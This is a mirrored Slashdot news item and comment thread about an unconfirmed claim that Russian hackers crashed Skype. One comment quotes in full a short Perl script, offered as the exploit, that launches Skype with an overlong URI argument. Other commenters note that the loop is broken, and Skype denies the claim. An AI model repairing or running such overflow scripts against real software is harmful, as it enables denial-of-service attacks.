Slashdot Mirror


Did Russian Hackers Crash Skype?

An anonymous reader sends us to the www.xakep.ru forum where a poster claims that the worldwide Skype crash was caused by Russian hackers (in Russian). The claim is that they found a local buffer overflow vulnerability caused by sending a long string to the Skype authorization server. You can try Google's beta Russian-to-English translation, but the interesting part is the exploit code, and that's more readable in the original. The Washington Post reports that Skype has denied this rumor.


  1. The code snippet seems to be wrong by ghost4096 · · Score: 4, Informative

    The loop body will never execute....

    1. Re:The code snippet seems to be wrong by eggnoglatte · · Score: 4, Informative

      Hex constants in Perl, like C/C++, have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.

    2. Re:The code snippet seems to be wrong by ThePhilips · · Score: 4, Informative

      Well, this is a very very very old Russian hacker tradition: introduce a flaw in the crack/exploit to prevent it from being (ab)used by idiots.

      --
      All hope abandon ye who enter here.
    3. Re:The code snippet seems to be wrong by eneville · · Score: 4, Informative

      Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.
      no, octal numbers start with 0. hex numbers start with x. typo: no, octal numbers start with 0. hex numbers start with 0x.
  2. Translation by ACS+Solver · · Score: 5, Informative

    Here's the article's introductory part properly translated.

    "The reason for yesterday's downtime of the Skype network is research of Russian crackers, as reported by one of our readers.

    While searching for a local buffer overflow, a possibility was found to send a long string to the server, overflowing its buffer and causing the server to go down. Its place is taken by another server from the P2P network, the error arises on it in the same way, and so on. As a result, the entire Skype network refused service for several hours and the developer team was forced to turn off authentication.

    Here's the exploit code:"

    1. Re:Translation by mobby_6kl · · Score: 4, Informative
      You've got to be kidding, I was about to submit my own translation! :)

      Anyway, your version is probably a little better, so I'll contribute with something else. The script is very short too, so here it is:

      #!/usr/bin/perl
      # Simle Code by Maranax Porex ;D
      # Ya Skaypeg!!
       
      for ($i=256; $i>xCCCCC; $i=$i+256)
      {
      $eot='AAAA' x $i;
      call_sp();
      }
      exit;
       
      sub call_sp()
      {
      $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
      system("$str");
      }

      The first page of comments seems to be just the usual bunch of trolls, assholes, and simply useless posts, except for one that claims the code has been shown not to do anything on a dedicated security site. The Skype article on the front page doesn't contain any additional information. The attack looks almost too simple to work, but I wasn't able to find any strong evidence that would suggest that it doesn't, at least not with a few quick searches.
  3. coincidence? by TheSHAD0W · · Score: 5, Informative

    I bet people are trying exploits against Skype (and other popular servers and services) all the time. If someone tries something funny, and the system crashes a few seconds afterwards, they may assume they were the cause.